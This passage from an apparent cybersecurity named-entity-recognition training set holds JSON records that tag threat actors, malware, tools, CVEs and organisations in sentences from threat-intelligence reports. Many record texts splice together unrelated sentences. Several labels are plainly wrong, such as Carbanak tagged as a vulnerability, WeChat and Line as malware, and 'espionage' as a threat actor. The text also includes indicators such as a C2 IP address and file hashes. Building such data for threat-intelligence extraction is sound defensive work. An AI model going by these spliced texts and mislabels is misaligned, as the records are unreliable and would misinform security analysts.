"cyberner_stix_train_000489", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //nttdocomo-qaq [ . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian . ThreatSight worked with the Threat Analysis Unit ( TAU ) to research the campaign . Beyond basic cybersecurity hygiene , including auditing current IT environments for vulnerabilities , implementing needed patches and regularly employing backups , its imperative to have multifactor authentication as a minimum on any externalfacing RDP , whilst preferably removing externalfacing RDP altogether .", "spans": {"THREAT_ACTOR: operators": [[69, 78]], "THREAT_ACTOR: APT28": [[86, 91]], "ORGANIZATION: citizens": [[119, 127], [131, 139]], "ORGANIZATION: ThreatSight": [[186, 197]], "ORGANIZATION: Threat Analysis Unit": [[214, 234]], "ORGANIZATION: TAU": [[237, 240]]}, "info": {"id": "cyberner_stix_train_000490", "source": "cyberner_stix_train"}} {"text": "In the past , Sednit used a similar technique for credential phishing .", "spans": {"THREAT_ACTOR: Sednit": [[14, 20]]}, "info": {"id": "cyberner_stix_train_000491", "source": "cyberner_stix_train"}} {"text": "The VBA drops and executes a new variant of Seduploader .", "spans": {"TOOL: VBA": [[4, 7]], "MALWARE: Seduploader": [[44, 55]]}, "info": {"id": "cyberner_stix_train_000492", "source": "cyberner_stix_train"}} {"text": "The first set of commands gathers information about the victim ’s computer and environment :", "spans": {}, "info": {"id": "cyberner_stix_train_000493", "source": "cyberner_stix_train"}} {"text": "] comgooogel [ . The Cloud Atlas implants utilize a rather unusual C&C mechanism . The HTRAN utility is merely a middle-man , facilitating connections between the victim and the attacker who is using the hop point . 
It contains features such as having the victim ’s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization ’s real Microsoft 365 login page .", "spans": {"TOOL: HTRAN": [[87, 92]]}, "info": {"id": "cyberner_stix_train_000494", "source": "cyberner_stix_train"}} {"text": "Nmap — BRONZE PRESIDENT used this freely available network scanning tool from the C:\\PerfLogs\\ folder .", "spans": {"TOOL: Nmap": [[0, 4]], "THREAT_ACTOR: BRONZE PRESIDENT": [[7, 23]]}, "info": {"id": "cyberner_stix_train_000495", "source": "cyberner_stix_train"}} {"text": "This background image likely contains a fake “ software update ” screen . Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services .", "spans": {"ORGANIZATION: WikiLeaks": [[142, 151]], "ORGANIZATION: DNS provider": [[155, 167]], "ORGANIZATION: intelligence services": [[451, 472]]}, "info": {"id": "cyberner_stix_train_000496", "source": "cyberner_stix_train"}} {"text": "Segment networks and segregate them into security zones .", "spans": {}, "info": {"id": "cyberner_stix_train_000497", "source": "cyberner_stix_train"}} {"text": "“ These communication channels are hard to discover and even harder to block entirely . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . 
Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world .", "spans": {"THREAT_ACTOR: Scattered Canary": [[179, 195]]}, "info": {"id": "cyberner_stix_train_000498", "source": "cyberner_stix_train"}} {"text": "'' This security hole is currently present in every operating system image for A83T , H3 or H8 devices that rely on kernel 3.4 , he added . In March 2018 we detected an ongoing campaign . Winnti Group targeting universities in Hong Kong . Once a system was exploited a unique downloader was dropped onto the victim ’s disk , containing a customized micro backdoor written in Assembler .", "spans": {"SYSTEM: A83T": [[79, 83]], "SYSTEM: H3": [[86, 88]], "SYSTEM: H8": [[92, 94]], "SYSTEM: kernel 3.4": [[116, 126]], "THREAT_ACTOR: Winnti Group": [[188, 200]], "TOOL: Assembler": [[375, 384]]}, "info": {"id": "cyberner_stix_train_000499", "source": "cyberner_stix_train"}} {"text": "Each of these layers seems to be different to some extent in the various samples we found .", "spans": {}, "info": {"id": "cyberner_stix_train_000500", "source": "cyberner_stix_train"}} {"text": "Should a device become infected , this backdoor can not be removed without root privilege . The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks . So the next block of the first one in the level can not be determined . 
Information about executed programs that violate one or more of these rules is recorded in the XProtect Database ( XPdb ) , which is stored in SQLite 3 format and located at /var / protected / xprotect / XPdb .", "spans": {"ORGANIZATION: financial institutions": [[136, 158]], "THREAT_ACTOR: Anunak": [[196, 202]], "THREAT_ACTOR: Corkow": [[205, 211]], "THREAT_ACTOR: Buhtrap": [[214, 221]], "THREAT_ACTOR: Lurk groups": [[228, 239]], "ORGANIZATION: banks": [[286, 291]], "SYSTEM: XProtect Database ( XPdb )": [[461, 487]]}, "info": {"id": "cyberner_stix_train_000501", "source": "cyberner_stix_train"}} {"text": "The second type of apps reveals an evolution in the author 's tactics . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121.127.249.74 over port 443 . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": {"MALWARE: rastls.dll": [[165, 175]], "MALWARE: Sycmentec.config files": [[180, 202]], "MALWARE: ELMER": [[209, 214]], "FILEPATH: 6c33223db475f072119fe51a2437a542": [[223, 255]], "TOOL: C2": [[272, 274]], "IP_ADDRESS: 121.127.249.74": [[286, 300]], "MALWARE: AgentTesla remote access trojan ( RAT": [[348, 385]], "TOOL: Cobalt Strike": [[390, 403]], "TOOL: njRAT": [[416, 421]]}, "info": {"id": "cyberner_stix_train_000502", "source": "cyberner_stix_train"}} {"text": "While it ’ s not the first of its kind , this Android malware app is more sophisticated than similar apps and possesses interesting features that enable its operators to steal transaction authorization codes from victims who download the app . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . 
The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented .", "spans": {"SYSTEM: Android": [[46, 53]], "THREAT_ACTOR: threat groups": [[334, 347]], "VULNERABILITY: CVE-2018-0798": [[366, 379]], "TOOL: RTF weaponizer": [[389, 403]], "MALWARE: script-based backdoors": [[417, 439]], "THREAT_ACTOR: OilRig group": [[474, 486]]}, "info": {"id": "cyberner_stix_train_000504", "source": "cyberner_stix_train"}} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155], [316, 329]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]], "MALWARE: POWRUNER": [[251, 259]], "MALWARE: malicious RTF": [[282, 295]]}, "info": {"id": "cyberner_stix_train_000505", "source": "cyberner_stix_train"}} {"text": "Unit 42 followed network traces and pivoted on the information left behind by this actor , such as open directories , document metadata , and binary peculiarities , which enabled us to find a custom-made piece of malware , that we named \" CapturaTela \" . One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: CapturaTela": [[239, 250]], "ORGANIZATION: bank": [[301, 305]]}, "info": {"id": "cyberner_stix_train_000506", "source": "cyberner_stix_train"}} {"text": "It then uses the AlarmManager to set a pending intent that will run its own service after a predefined interval . 
The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later .", "spans": {"SYSTEM: AlarmManager": [[17, 29]], "THREAT_ACTOR: individuals": [[118, 129]], "TOOL: Hancitor": [[136, 144]], "TOOL: Chanitor": [[176, 184]]}, "info": {"id": "cyberner_stix_train_000507", "source": "cyberner_stix_train"}} {"text": "] it ( \" attiva '' is the Italian for \" activate '' ) . The ultimate objective of targeted attacks is to acquire sensitive data . Takes screenshots from the infected machine . RDP is designed to allow legitimate users to remotely connect to and control a system , such as when IT support needs to remotely control an employees computer to troubleshoot an issue or conduct regular maintenance .", "spans": {"TOOL: RDP": [[176, 179]]}, "info": {"id": "cyberner_stix_train_000508", "source": "cyberner_stix_train"}} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[176, 183]], "MALWARE: ASPXTool": [[232, 240]], "TOOL: Internet Information Services": [[246, 275]], "TOOL: IIS": [[278, 281]], "TOOL: Web shell": [[295, 304], [412, 421]], "THREAT_ACTOR: OwaAuth": [[375, 382]], "ORGANIZATION: Microsoft": [[439, 448]], "TOOL: Outlook": [[482, 489]]}, "info": {"id": "cyberner_stix_train_000509", "source": "cyberner_stix_train"}} {"text": "These attacks are still largely perpetrated via spear phishing campaigns , whether via simple executable attachments in hopes that a victim will launch the file to using a previously observed DDE exploitation technique .", "spans": {}, "info": {"id": "cyberner_stix_train_000510", "source": "cyberner_stix_train"}} {"text": "This visual context enables SOC personnel to investigate alerts with all related artifacts , understand the scope of the breach , and prepare a comprehensive action plan .", "spans": {}, "info": {"id": "cyberner_stix_train_000511", "source": "cyberner_stix_train"}} {"text": "It is important to give certificates the protection they need so they can't be used maliciously .", "spans": {}, "info": {"id": "cyberner_stix_train_000512", "source": "cyberner_stix_train"}} {"text": "For example : Conclusions The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform . Madcap” is similar to the XAgent malware , but the former is focused on recording audio . 
We have previously observed the admin@338 group use BUBBLEWRAP .", "spans": {"MALWARE: Skygofree": [[30, 39]], "SYSTEM: Android": [[40, 47]], "MALWARE: Madcap”": [[141, 148]], "MALWARE: XAgent": [[167, 173]], "THREAT_ACTOR: admin@338 group": [[263, 278]], "MALWARE: BUBBLEWRAP": [[283, 293]]}, "info": {"id": "cyberner_stix_train_000513", "source": "cyberner_stix_train"}} {"text": "If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities .", "spans": {}, "info": {"id": "cyberner_stix_train_000514", "source": "cyberner_stix_train"}} {"text": "] 122:28844 61 [ . Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed . This additional payload is then executed in memory . Cisco Secure Malware Analytics ( Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": {"THREAT_ACTOR: Dukes": [[44, 49]], "TOOL: Cisco Secure Malware Analytics": [[229, 259]], "TOOL: Threat Grid": [[262, 273]]}, "info": {"id": "cyberner_stix_train_000515", "source": "cyberner_stix_train"}} {"text": "If mcpef.apk is removed , brother.apk reinstalls it from a META-INF/brother file boy , post.sh : The shell scripts u sed for application persistency . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . 
Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well .", "spans": {"ORGANIZATION: 360 Core Security": [[173, 190]], "THREAT_ACTOR: APT-C-06": [[223, 231]], "VULNERABILITY: (CVE-2018-8174)": [[283, 298]]}, "info": {"id": "cyberner_stix_train_000516", "source": "cyberner_stix_train"}} {"text": "We observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large Central Asian nation .", "spans": {"MALWARE: Zebrocy": [[31, 38]]}, "info": {"id": "cyberner_stix_train_000517", "source": "cyberner_stix_train"}} {"text": "The now infamous Dridex banking Trojan can trace much of its DNA to Cridex and Bugat .", "spans": {"MALWARE: Dridex": [[17, 23]], "MALWARE: Trojan": [[32, 38]], "MALWARE: Cridex": [[68, 74]], "MALWARE: Bugat": [[79, 84]]}, "info": {"id": "cyberner_stix_train_000518", "source": "cyberner_stix_train"}} {"text": "This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it .", "spans": {"THREAT_ACTOR: Sofacy": [[23, 29]]}, "info": {"id": "cyberner_stix_train_000519", "source": "cyberner_stix_train"}} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": {"MALWARE: malicious documents": [[29, 48]], "VULNERABILITY: CVE-2017-0199": [[60, 73]], "TOOL: LATENTBOT malware": [[99, 116]], "ORGANIZATION: army officials": [[150, 164]], "MALWARE: WeChat": [[216, 222]], "MALWARE: SmeshApp": [[225, 233]], "MALWARE: Line": [[240, 244]], "ORGANIZATION: army personnel": [[345, 359]]}, "info": {"id": "cyberner_stix_train_000520", "source": "cyberner_stix_train"}} {"text": "How does Chrysaor work ? On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . The configuration consists of four fields : This incident and last year ’s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features .", "spans": {"MALWARE: Chrysaor": [[9, 17]], "ORGANIZATION: Proofpoint": [[57, 67]], "THREAT_ACTOR: group": [[120, 125]], "ORGANIZATION: shipbuilding company": [[141, 161]], "ORGANIZATION: military": [[203, 211]], "MALWARE: INDUSTROYER.V2": [[294, 308]], "THREAT_ACTOR: OT attack capabilities": [[350, 372]]}, "info": {"id": "cyberner_stix_train_000521", "source": "cyberner_stix_train"}} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . 
The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "MALWARE: Trojan.Naid": [[221, 232]], "FILEPATH: Backdoor.Moudoor": [[235, 251]], "MALWARE: Backdoor.Hikit": [[258, 272]]}, "info": {"id": "cyberner_stix_train_000522", "source": "cyberner_stix_train"}} {"text": "These improvements render FakeSpy one of the most powerful information stealers on the market . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we’ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . DHS has previously released Alert TA14-353A .", "spans": {"MALWARE: FakeSpy": [[26, 33]], "ORGANIZATION: Agari Cyber Intelligence": [[122, 146]], "THREAT_ACTOR: group": [[179, 184]], "THREAT_ACTOR: Scattered Canary": [[197, 213]], "ORGANIZATION: business": [[360, 368]], "ORGANIZATION: DHS": [[371, 374]]}, "info": {"id": "cyberner_stix_train_000523", "source": "cyberner_stix_train"}} {"text": "In April , security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices .", "spans": {"ORGANIZATION: Microsoft": [[39, 48]], "TOOL: Threat Intelligence Center": [[49, 75]]}, "info": {"id": "cyberner_stix_train_000524", "source": "cyberner_stix_train"}} {"text": "Finally , the app can remove itself through three ways : Via a command from the server Autoremove if the device has not been able to check in to the server after 60 days Via an antidote file . TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu . 
Domain names were carefully chosen to look like they are related to the game or application publisher . When the malware is executed , it attempts to run the following commands , most of which attempt to stop various security and backup related software", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[193, 207]], "THREAT_ACTOR: TEMP.Jumper": [[297, 308]], "THREAT_ACTOR: group": [[313, 318]], "TOOL: NanHaiShu": [[377, 386]], "MALWARE: malware": [[502, 509]]}, "info": {"id": "cyberner_stix_train_000525", "source": "cyberner_stix_train"}} {"text": "Symantec worked with the certificate owner to confirm that the hacktool was not associated with them .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "cyberner_stix_train_000526", "source": "cyberner_stix_train"}} {"text": "The ransom demand for 0.2 Bitcoins ( roughly $ 180 ) is a much higher ransom demand than has been seen in mobile ransomware so far . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software : browsers , email clients , messengers , etc. , and can act as a keylogger . 
Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: AveMaria": [[276, 284]], "TOOL: email": [[397, 402]]}, "info": {"id": "cyberner_stix_train_000527", "source": "cyberner_stix_train"}} {"text": "Such devices still must be identifiable , maintained , and monitored by security teams , especially in large complex enterprises .", "spans": {}, "info": {"id": "cyberner_stix_train_000528", "source": "cyberner_stix_train"}} {"text": "The webshell named bitreeview.aspx was saved to a folder within the SharePoint server ’s install path .", "spans": {"FILEPATH: bitreeview.aspx": [[19, 34]], "TOOL: SharePoint": [[68, 78]]}, "info": {"id": "cyberner_stix_train_000529", "source": "cyberner_stix_train"}} {"text": "The campaign ’s lure content revolves around recent geopolitical events , espeically the Israeli-Palestinian conflict , the assassination of Qasem Soleimani , and the ongoing conflict between Hamas and Fatah Palestinian movements .", "spans": {}, "info": {"id": "cyberner_stix_train_000530", "source": "cyberner_stix_train"}} {"text": "Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"VULNERABILITY: Flash exploit": [[65, 78]], "VULNERABILITY: CVE-2016-4117": [[81, 94]], "ORGANIZATION: Government officials": [[161, 181]]}, "info": {"id": "cyberner_stix_train_000531", "source": "cyberner_stix_train"}} {"text": "'' in a variety of ways , such as static analysis , dynamic analysis , and machine learning . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . 
Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability , and the local Windows privilege escalation vulnerability CVE-2015-1701 . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": {"ORGANIZATION: Group-IB": [[126, 134]], "ORGANIZATION: bank": [[224, 228]], "ORGANIZATION: Microsoft": [[335, 344]], "TOOL: Word": [[345, 349]], "TOOL: EPS": [[389, 392]], "SYSTEM: Windows": [[448, 455]], "VULNERABILITY: CVE-2015-1701": [[491, 504]], "THREAT_ACTOR: attacker": [[545, 553]], "SYSTEM: Microsoft Exchange Server": [[593, 618]]}, "info": {"id": "cyberner_stix_train_000532", "source": "cyberner_stix_train"}} {"text": "After launching , it hides its presence on the system and checks the defined Twitter account at regular intervals for commands . The first type of attack Scattered Canary pivoted to was credential phishing . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage .", "spans": {"SYSTEM: Twitter": [[77, 84]], "THREAT_ACTOR: Scattered Canary": [[154, 170]], "MALWARE: KillDisk": [[218, 226]], "THREAT_ACTOR: attackers": [[295, 304]], "THREAT_ACTOR: cyber-sabotage": [[399, 413]]}, "info": {"id": "cyberner_stix_train_000533", "source": "cyberner_stix_train"}} {"text": "Before connecting with the socket , it creates a malware environment in ‘ APPDATA/myupd ’ and creates a sqlite3 database there – ‘ myupd_tmp\\\\mng.db ’ : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of 
Qatar . FIN4 is a financially motivated threat group that has targeted confidential information related to the public financial market , particularly regarding healthcare and pharmaceutical companies , since at least 2013 .", "spans": {"MALWARE: document": [[373, 381]], "THREAT_ACTOR: FIN4": [[521, 525]]}, "info": {"id": "cyberner_stix_train_000534", "source": "cyberner_stix_train"}} {"text": "Earlier this year , Cybereason identified an advanced , persistent attack targeting telecommunications providers that has been underway for years , soon after deploying into the environment . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"ORGANIZATION: Cybereason": [[20, 30]], "ORGANIZATION: telecommunications providers": [[84, 112]], "ORGANIZATION: Deepen": [[192, 198]], "ORGANIZATION: China and US relations experts": [[287, 317]], "ORGANIZATION: Defense Department": [[320, 338]], "ORGANIZATION: geospatial groups": [[354, 371]], "ORGANIZATION: federal government": [[383, 401]]}, "info": {"id": "cyberner_stix_train_000535", "source": "cyberner_stix_train"}} {"text": "COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . 
This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[0, 12]], "ORGANIZATION: telecommunications": [[46, 64]], "ORGANIZATION: government": [[67, 77]], "ORGANIZATION: defense": [[80, 87]], "ORGANIZATION: oil": [[90, 93]], "ORGANIZATION: financial services organizations": [[100, 132]], "ORGANIZATION: individual victims": [[191, 209]], "ORGANIZATION: social media": [[218, 230]], "SYSTEM: Windows": [[312, 319]], "FILEPATH: KBDLV2.DLL": [[366, 376]], "FILEPATH: AUTO.DLL": [[380, 388]]}, "info": {"id": "cyberner_stix_train_000536", "source": "cyberner_stix_train"}} {"text": "Google officials removed the malicious apps from the Play market after receiving a private report of their existence . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness . 
Elfin also makes frequent use of a number of publicly available hacking tools , including : Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he ’d turned his considerable harassment skills squarely against the company .", "spans": {"ORGANIZATION: Google": [[0, 6]], "SYSTEM: Play market": [[53, 64]], "THREAT_ACTOR: Romeo": [[149, 154]], "THREAT_ACTOR: Sierra groups": [[159, 172]], "THREAT_ACTOR: Lazarus Group": [[389, 402]], "TOOL: RATs": [[420, 424]], "TOOL: staging malware": [[429, 444]], "THREAT_ACTOR: Elfin": [[497, 502]], "THREAT_ACTOR: Will Harrison": [[589, 602]], "ORGANIZATION: Ashley Madison": [[624, 638]]}, "info": {"id": "cyberner_stix_train_000537", "source": "cyberner_stix_train"}} {"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “ POWERSTATS ” .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "TOOL: PowerShell-based": [[69, 85]], "MALWARE: POWERSTATS": [[117, 127]]}, "info": {"id": "cyberner_stix_train_000538", "source": "cyberner_stix_train"}} {"text": "The commands are self-explanatory and show the features included in the malware . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions . We found more than 40 of these campaign tags . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": {"TOOL: Blue Lambert": [[109, 121]], "TOOL: Green Lambert": [[174, 187]]}, "info": {"id": "cyberner_stix_train_000539", "source": "cyberner_stix_train"}} {"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . 
OSX_DOK.C seems to be another version of WERDLOD ( Detected by Trend Micro as TROJ_WERDLOD Family ) , which is a malware that was used during the Operation Emmental campaigns—an interesting development that we will tackle further in this blog post .", "spans": {"MALWARE: Trojan": [[33, 39]], "MALWARE: OSX_DOK.C": [[128, 137]], "MALWARE: WERDLOD": [[169, 176]], "ORGANIZATION: Trend Micro": [[191, 202]], "MALWARE: TROJ_WERDLOD Family": [[206, 225]]}, "info": {"id": "cyberner_stix_train_000540", "source": "cyberner_stix_train"}} {"text": "Receiver was involved in receiving commands from the Server and the main functionality of Sender was to send all the data collected to the C & C over Wi-Fi . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team .", "spans": {"TOOL: Atmosphere": [[216, 226]], "THREAT_ACTOR: Silence": [[251, 258]], "MALWARE: xfs-disp.exe": [[324, 336]], "ORGANIZATION: Bank": [[391, 395]], "THREAT_ACTOR: Cobalt Group": [[409, 421]], "MALWARE: Cobalt": [[470, 476]], "MALWARE: Strike beacon": [[477, 490]], "MALWARE: JavaScript backdoor": [[498, 517]], "ORGANIZATION: Talos": [[558, 563]]}, "info": {"id": "cyberner_stix_train_000541", "source": "cyberner_stix_train"}} {"text": "On September 10 , 2019 , we observed an HTTP POST request to the following URL that we believe was the exploitation of CVE-2019-0604 in a publicly facing SharePoint server ( T1190 ) : /_layouts/15/picker.aspx .", "spans": {"VULNERABILITY: CVE-2019-0604": [[119, 132]], "TOOL: SharePoint": [[154, 164]], "FILEPATH: /_layouts/15/picker.aspx": [[184, 208]]}, "info": {"id": "cyberner_stix_train_000542", "source": 
"cyberner_stix_train"}} {"text": "After the modules are installed they are deployed to the short term memory and deleted from the device storage , which makes the Trojan a lot harder to catch . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' .", "spans": {"THREAT_ACTOR: ScarCruft": [[160, 169]], "VULNERABILITY: Flash Player exploit": [[208, 228]], "VULNERABILITY: CVE-2016-4117": [[231, 244]], "MALWARE: Helminth": [[290, 298]], "TOOL: C2": [[363, 365]], "MALWARE: Trojan": [[382, 388]]}, "info": {"id": "cyberner_stix_train_000543", "source": "cyberner_stix_train"}} {"text": "In this case , Group 74 did not use an exploit or any 0-day but simply used scripting language embedded within the Microsoft Office document .", "spans": {"THREAT_ACTOR: Group 74": [[15, 23]], "VULNERABILITY: 0-day": [[54, 59]], "ORGANIZATION: Microsoft": [[115, 124]], "TOOL: Office": [[125, 131]]}, "info": {"id": "cyberner_stix_train_000544", "source": "cyberner_stix_train"}} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . 
The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"TOOL: Black Energy": [[117, 129]], "ORGANIZATION: energy": [[165, 171]], "ORGANIZATION: government": [[174, 184]], "ORGANIZATION: media": [[191, 196]], "THREAT_ACTOR: espionage": [[201, 210]], "THREAT_ACTOR: admin@338": [[264, 273]], "ORGANIZATION: financial": [[302, 311]], "ORGANIZATION: policy organizations": [[316, 336]], "TOOL: emails": [[376, 382]], "ORGANIZATION: audiences": [[425, 434]]}, "info": {"id": "cyberner_stix_train_000545", "source": "cyberner_stix_train"}} {"text": "Retrieve media exchanged through WhatsApp . Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 . In one instance , it lures victims to open an email attachment . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": {"SYSTEM: WhatsApp": [[33, 41]], "TOOL: email": [[208, 213]], "THREAT_ACTOR: Rhysida": [[227, 234]], "ORGANIZATION: Chilean Army": [[406, 418]]}, "info": {"id": "cyberner_stix_train_000546", "source": "cyberner_stix_train"}} {"text": "This is done by reading the /proc/ [ pid ] /cmdline file . Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments . This additional obfuscation puts yet another layer between APT17 and the security professionals attempting to chase them down . 
• Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar – if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": {"ORGANIZATION: industrial": [[124, 134]], "ORGANIZATION: manufacturing": [[137, 150]], "ORGANIZATION: engineering organizations": [[155, 180]], "ORGANIZATION: Kaspersky Lab": [[183, 196]], "THREAT_ACTOR: APT17": [[346, 351]], "THREAT_ACTOR: MiniDuke - s creators": [[461, 482]], "ORGANIZATION: Twitter": [[554, 561]], "MALWARE: malware": [[609, 616]], "ORGANIZATION: Google": [[625, 631]]}, "info": {"id": "cyberner_stix_train_000547", "source": "cyberner_stix_train"}} {"text": "Another evasive mechanism used by the backdoor is how it checks whether an Arabic keyboard and Arabic language settings are used on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_000548", "source": "cyberner_stix_train"}} {"text": "In two of the cases , the passwords for the devices were deployed without changing the default manufacturer ’s passwords and in the third instance the latest security update had not been applied to the device .", "spans": {}, "info": {"id": "cyberner_stix_train_000549", "source": "cyberner_stix_train"}} {"text": "As can be seen , the possibilities offered by the bot are pretty common . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . 
